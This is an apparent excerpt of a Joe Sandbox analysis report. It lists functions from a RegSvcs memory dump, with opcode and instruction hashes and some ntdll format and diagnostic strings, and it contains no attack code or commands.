                                                              Function 015D2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43047d0d4f9e01f66d3fc93609c2715b70bbdc59f2d6f57896d0813f6a807ae8
                                                              • Instruction ID: e61d4a2461a75731a8ca2a9f4d1c9c8da54f98b493b12402bc1e6fa48235ca5f
                                                              • Opcode Fuzzy Hash: 43047d0d4f9e01f66d3fc93609c2715b70bbdc59f2d6f57896d0813f6a807ae8
                                                              • Instruction Fuzzy Hash: 6D9002A1601540924504B3588408B0A4585A7E0211B59C416E1054960CC56589519235
                                                              Function 015D2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f35e8797dcd1400d38196328e0f96112e49db9770b6fa4dd2bc8eeba1da7b2a
                                                              • Instruction ID: d3050f94d628d1a15d05cdf48969aa9524c8f8b301846272e047fc5d2b938952
                                                              • Opcode Fuzzy Hash: 5f35e8797dcd1400d38196328e0f96112e49db9770b6fa4dd2bc8eeba1da7b2a
                                                              • Instruction Fuzzy Hash: 2E90022961340002D1847258540C60A0085A7D1212F99D815A0015958CC95589695321
                                                              Function 015D2D00 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f329883de64499919a32ea63c74c6126f202d58e3fc387b6c6db59be4e64c2a3
                                                              • Instruction ID: 12431e8b94bd8ee59619cd30bf8ce36b6987e2e6759fe86401264aeff35423e5
                                                              • Opcode Fuzzy Hash: f329883de64499919a32ea63c74c6126f202d58e3fc387b6c6db59be4e64c2a3
                                                              • Instruction Fuzzy Hash: 1990022160544442D1047658540CA060085A7D0215F59D411A1064995DC6758951A231
                                                              Function 015D2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c2719b3cbf36c9c19091cef01df48aa18c14b089d894eed7efe418973a4d9159
                                                              • Instruction ID: f5b641957c84a6f71eeca6ec0a6b9a32453f44b981fe0e5842c232b7a3f936cc
                                                              • Opcode Fuzzy Hash: c2719b3cbf36c9c19091cef01df48aa18c14b089d894eed7efe418973a4d9159
                                                              • Instruction Fuzzy Hash: B490022170140003D1447258541C6064085F7E1311F59D411E0414954CD95589565322
                                                              Function 015D2DD0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88face714ae4c074dc4a6fcd52360478ec455fe1099a00e5ccaf10a9f16c8294
                                                              • Instruction ID: eee8aa38b1b50d98ceb513abc3a2cfef536e50ae0a5fd733f3ddce4c300c70a8
                                                              • Opcode Fuzzy Hash: 88face714ae4c074dc4a6fcd52360478ec455fe1099a00e5ccaf10a9f16c8294
                                                              • Instruction Fuzzy Hash: 14900221642441525549B25844085074086B7E0251799C412A1414D50CC5669956D721
                                                              Function 015D2DB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ae1bd3410b23b27f8be13dd2b9c6e5738374594fcc5712a68d5de6975d1defc
                                                              • Instruction ID: f5214c6576ba2565a4aaf5d28f0990439c2372ff005309227b7f46ad4e5417aa
                                                              • Opcode Fuzzy Hash: 1ae1bd3410b23b27f8be13dd2b9c6e5738374594fcc5712a68d5de6975d1defc
                                                              • Instruction Fuzzy Hash: 2690023164140402D145725844086060089B7D0251F99C412A0424954EC6958B56AB61
                                                              Function 015D2C60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e1f6116b36abdc7e5174ed774286f3754712b9e23ab8a21fde27f0139c3864f
                                                              • Instruction ID: 16eec403e16018cbba7ea28841ca2de9f6e3bdaedf473b1d9bd9ee983e4fde28
                                                              • Opcode Fuzzy Hash: 5e1f6116b36abdc7e5174ed774286f3754712b9e23ab8a21fde27f0139c3864f
                                                              • Instruction Fuzzy Hash: DD90023160140842D10472584408B460085A7E0311F59C416A0124A54DC655C9517621
                                                              Function 015D2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 497449447f1b858d238dd84eb72a10fc251b053733db6a584f6cd36bda29311e
                                                              • Instruction ID: 8fe71cd8fe0a065c45b963084c401a1d10288fc83c630cc054f1fe2d6492462a
                                                              • Opcode Fuzzy Hash: 497449447f1b858d238dd84eb72a10fc251b053733db6a584f6cd36bda29311e
                                                              • Instruction Fuzzy Hash: D0900221A0540402D1447258541C7060095A7D0211F59D411A0024954DC6998B5567A1
                                                              Function 015D2CF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4a9a8cb150fc455e5f894f0adb2d9f49aef5e084490edd72fe3a5ee048bcf4f3
                                                              • Instruction ID: c1d1f14a7b2012ce0fd7be752339d52f52a6f0c9c9ab9bcc13f7fdf6bee4e8a2
                                                              • Opcode Fuzzy Hash: 4a9a8cb150fc455e5f894f0adb2d9f49aef5e084490edd72fe3a5ee048bcf4f3
                                                              • Instruction Fuzzy Hash: 5490023160140403D1047258550C7070085A7D0211F59D811A0424958DD69689516221
                                                              Function 015D2CA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8ffc84f42d056cc0b72a36485f7f7474db2f0cc67b6840a6b1d846c93593133
                                                              • Instruction ID: d5cd74440a704be4fc878b21c4a42b1f9e17e6b4b4c46a424fd5871842444df1
                                                              • Opcode Fuzzy Hash: e8ffc84f42d056cc0b72a36485f7f7474db2f0cc67b6840a6b1d846c93593133
                                                              • Instruction Fuzzy Hash: 5B90023160140402D1047698540C6460085A7E0311F59D411A5024955EC6A589916231
                                                              Function 015D2F60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 71f7658ccec156499fb6234dfb2de5d133a5373e8e04ce4a8a9b4f3da5dfcd37
                                                              • Instruction ID: 6eab1a12bc8ad2e2615b66330cbf82171f4f02066b81e53d96482d2f65fa4c62
                                                              • Opcode Fuzzy Hash: 71f7658ccec156499fb6234dfb2de5d133a5373e8e04ce4a8a9b4f3da5dfcd37
                                                              • Instruction Fuzzy Hash: 7590026161140042D1087258440870600C5A7E1211F59C412A2154954CC5698D615225
                                                              Function 015D2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ce995eacf6b4c0c35c86dbe9ef2af3fc310df65fdb0a794a576175a0da7a4483
                                                              • Instruction ID: b78e8e8ff324cf9dbcd3a4a1f08fb0f1d0d3348591d300edfc8324cec4348ff6
                                                              • Opcode Fuzzy Hash: ce995eacf6b4c0c35c86dbe9ef2af3fc310df65fdb0a794a576175a0da7a4483
                                                              • Instruction Fuzzy Hash: F890026174140442D10472584418B060085E7E1311F59C415E1064954DC659CD526226
                                                              Function 015D2FE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d3cfe15d7cc3a25e7f2fc1f43a5658a1dade396c9f90ee0ff295e8eae71cc6ad
                                                              • Instruction ID: 4629a896096f787e29b9ced9ea2940726aaaf89877a930b0fe5ca6ff5ea2a01a
                                                              • Opcode Fuzzy Hash: d3cfe15d7cc3a25e7f2fc1f43a5658a1dade396c9f90ee0ff295e8eae71cc6ad
                                                              • Instruction Fuzzy Hash: 90900221611C0042D20476684C18B070085A7D0313F59C515A0154954CC95589615621
                                                              Function 015D2F90 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b73ca912fd9458ce907a74d88ad4a9419a731ab8c7b3da4ff8cdf23605081fa7
                                                              • Instruction ID: 1bb8e5f5c057e8876e665a347d8c6fe5b0954d6acb0d75dd157969071717b09e
                                                              • Opcode Fuzzy Hash: b73ca912fd9458ce907a74d88ad4a9419a731ab8c7b3da4ff8cdf23605081fa7
                                                              • Instruction Fuzzy Hash: AF90023160180402D1047258481870B0085A7D0312F59C411A1164955DC66589516671
                                                              Function 015D2FB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7482a9b6ce8aa6ef3cc75d775cfd718f085ec4dc1a86e959157fd82397053b58
                                                              • Instruction ID: 13126e730eed9474dac07f22c8ffddf060866756652a52456a96ea34fa4bbab9
                                                              • Opcode Fuzzy Hash: 7482a9b6ce8aa6ef3cc75d775cfd718f085ec4dc1a86e959157fd82397053b58
                                                              • Instruction Fuzzy Hash: F1900221A01400424144726888489064085BBE1221759C521A0998950DC59989655765
                                                              Function 015D2FA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f47f12c0a4de7f85139d83ecd6ae03e63291891d145018124d963b225689d5c3
                                                              • Instruction ID: abfaecb31d27ded898f2dc198357e2c0bf3110baefac1a4995bc3a0ff8df438e
                                                              • Opcode Fuzzy Hash: f47f12c0a4de7f85139d83ecd6ae03e63291891d145018124d963b225689d5c3
                                                              • Instruction Fuzzy Hash: 8590023160180402D1047258480C7470085A7D0312F59C411A5164955EC6A5C9916631
                                                              Function 015D2E30 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7ce4f9cd2493b148f848ae5c2a859a4f4ea65995d3b299214f1401a1f193771
                                                              • Instruction ID: d0f760d3a659709de027d33b5a77410c8b655e8830763b12b83b3b23d4ce903a
                                                              • Opcode Fuzzy Hash: e7ce4f9cd2493b148f848ae5c2a859a4f4ea65995d3b299214f1401a1f193771
                                                              • Instruction Fuzzy Hash: 3E90022170140402D106725844186060089E7D1355F99C412E1424955DC6658A53A232
                                                              Function 015D2EE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92db9b83bbf18ea3f6eddb886597e2cf1c6a334dd21056741dd6a35575811274
                                                              • Instruction ID: d7adbcba0e9a8fbfc6a87e84133cd27eca80def3a3cc67819cface29b045b9aa
                                                              • Opcode Fuzzy Hash: 92db9b83bbf18ea3f6eddb886597e2cf1c6a334dd21056741dd6a35575811274
                                                              • Instruction Fuzzy Hash: 5390026160180403D144765848086070085A7D0312F59C411A2064955ECA698D516235
                                                              Function 015D2E80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ecea7384fd756249ad23f788594e76d777e8fadf130a5c4b885355a7d595d867
                                                              • Instruction ID: 29d057ab39bb92cdd35a86d8b03c94b77e9a148133dd738c260234c8b0108f65
                                                              • Opcode Fuzzy Hash: ecea7384fd756249ad23f788594e76d777e8fadf130a5c4b885355a7d595d867
                                                              • Instruction Fuzzy Hash: 90900221A0140502D10572584408616008AA7D0251F99C422A1024955ECA658A92A231
                                                              Function 015D2EA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bc4f4907806136d721d7fa3c68661be19af7c30a1bb64dcb7f80f66371908708
                                                              • Instruction ID: 527b2bb90c8e7c394b00546424f191cf278eddbc0f293f41837fd272af30c0ec
                                                              • Opcode Fuzzy Hash: bc4f4907806136d721d7fa3c68661be19af7c30a1bb64dcb7f80f66371908708
                                                              • Instruction Fuzzy Hash: E890027160140402D144725844087460085A7D0311F59C411A5064954EC6998ED56765
                                                              Function 015D3010 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e1905da10e5895ff83613507b5903f69eda38a0e4087b8c07e58d807fc41fb9
                                                              • Instruction ID: 4dc3d3c0073ed8cb0c2431772cc76f5ee1ca9d8f7a903f26b578bc639acfc31a
                                                              • Opcode Fuzzy Hash: 3e1905da10e5895ff83613507b5903f69eda38a0e4087b8c07e58d807fc41fb9
                                                              • Instruction Fuzzy Hash: A290022160184442D14473584808B0F4185A7E1212F99C419A4156954CC95589555721
                                                              Function 015D3090 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 649da0f443889af2913a3ac93838719f8fe661468e85d540e43584470d12ebdb
                                                              • Instruction ID: 69ad77a13115d089e3f6199c3608b5703c1e450972c8e7acdb108fb93276f408
                                                              • Opcode Fuzzy Hash: 649da0f443889af2913a3ac93838719f8fe661468e85d540e43584470d12ebdb
                                                              • Instruction Fuzzy Hash: BF90022164140802D144725884187070086E7D0611F59C411A0024954DC6568A6567B1
                                                              Function 015D39B0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 47d19593e3bc67ab661ff09d50629ce8afebeb6cba7d826b6da7c34762d2974c
                                                              • Instruction ID: 4faadddc6727fd6f5711aaee08636664f3d859198d176a1d4deb48ea4b159a63
                                                              • Opcode Fuzzy Hash: 47d19593e3bc67ab661ff09d50629ce8afebeb6cba7d826b6da7c34762d2974c
                                                              • Instruction Fuzzy Hash: 2890022164545102D154725C44086164085B7E0211F59C421A0814994DC59589556321
                                                              Function 015D3D70 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a7a943c25c87eeaa4e6abce30d379b29ecd79bcd9010e78749df2cb818aefbe5
                                                              • Instruction ID: d1d5a9c644c7c2bef3a9778a3c46285d44ac53089c12027f0bba5b6335d82613
                                                              • Opcode Fuzzy Hash: a7a943c25c87eeaa4e6abce30d379b29ecd79bcd9010e78749df2cb818aefbe5
                                                              • Instruction Fuzzy Hash: 2090023560140402D5147258580864600C6A7D0311F59D811A0424958DC69489A1A221
                                                              Function 015D3D10 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2ab8c271c863c3ffcff9e517406ffd049b7de69e8017a841861c27f431a17be0
                                                              • Instruction ID: a9ce98f62f8b3cde2e656b803d8bf9b73bf5b96bd5a3f52db84c6eb0ea341389
                                                              • Opcode Fuzzy Hash: 2ab8c271c863c3ffcff9e517406ffd049b7de69e8017a841861c27f431a17be0
                                                              • Instruction Fuzzy Hash: 0B90023160240142954473585808A4E4185A7E1312B99D815A0015954CC95489615321
                                                              Function 015D2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: c8a7568f676a18a8ae77a3c6076824ac5f56f67c71ba10dbc3ede338dba9dce1
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Function 015D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 2c34eeb85fa7ab9545ba12a6ee022fead3561d39bcf34be95f473f3146655c99
                                                              • Instruction ID: df23dc21eeb217cef10665139a51cf27273a1e9efddfd195031fa44906b3d727
                                                              • Opcode Fuzzy Hash: 2c34eeb85fa7ab9545ba12a6ee022fead3561d39bcf34be95f473f3146655c99
                                                              • Instruction Fuzzy Hash: EC51E8B1A04216BFCB25DB9CCC9097EFBF8BB48241B548169F495DB681D374DE4087E0
                                                              Function 01642410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: ec157f387e55dd412c2b2492e034a8d7be05f2cdb5dceab7d9a99d61591218af
                                                              • Instruction ID: d8db2cc935c04da8549c0d4b0bacd9880ed0dd0ebb3c32833c86eeddd5fda8ee
                                                              • Opcode Fuzzy Hash: ec157f387e55dd412c2b2492e034a8d7be05f2cdb5dceab7d9a99d61591218af
                                                              • Instruction Fuzzy Hash: 9651F475A00646AFCB24DF9CDCA097EBBF9EF44200B24845EF496D7681E7B4DA4087A0
                                                              Function 015C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Execute=1, xrefs: 01604713
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01604725
                                                              • ExecuteOptions, xrefs: 016046A0
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01604742
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01604787
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016046FC
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01604655
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: e8a01bf11c799548d944be44f634e2dacafefcfe065c37610b6b6ee9e4c05f5a
                                                              • Instruction ID: 785c176b1b668f34f1b48950a1252c830c4a8a00b4b28a004afc10c9a6e35368
                                                              • Opcode Fuzzy Hash: e8a01bf11c799548d944be44f634e2dacafefcfe065c37610b6b6ee9e4c05f5a
                                                              • Instruction Fuzzy Hash: 9651093160021A7EEF21AFE9EC86BAE77A8FF58700F04009DD605AF591DB709A458F54
                                                              Function 015DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: f176d336896507b81ae247c519764fd48b9e536a4949eb655f99d2d663688700
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 4381AD70E0524A9FEF35CE6CC8917BEBBA3BF46360F1A4659D861AF291C6349840CB51
                                                              Function 016420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 0c4d80920fc8e84668a33cd49b23d2b2398be0338a8c55c993f24f2627ffbc18
                                                              • Instruction ID: ba6e191a6adb3e40efcdd6cb78189a020b2d58862274464fa9570a7dbbb95b2d
                                                              • Opcode Fuzzy Hash: 0c4d80920fc8e84668a33cd49b23d2b2398be0338a8c55c993f24f2627ffbc18
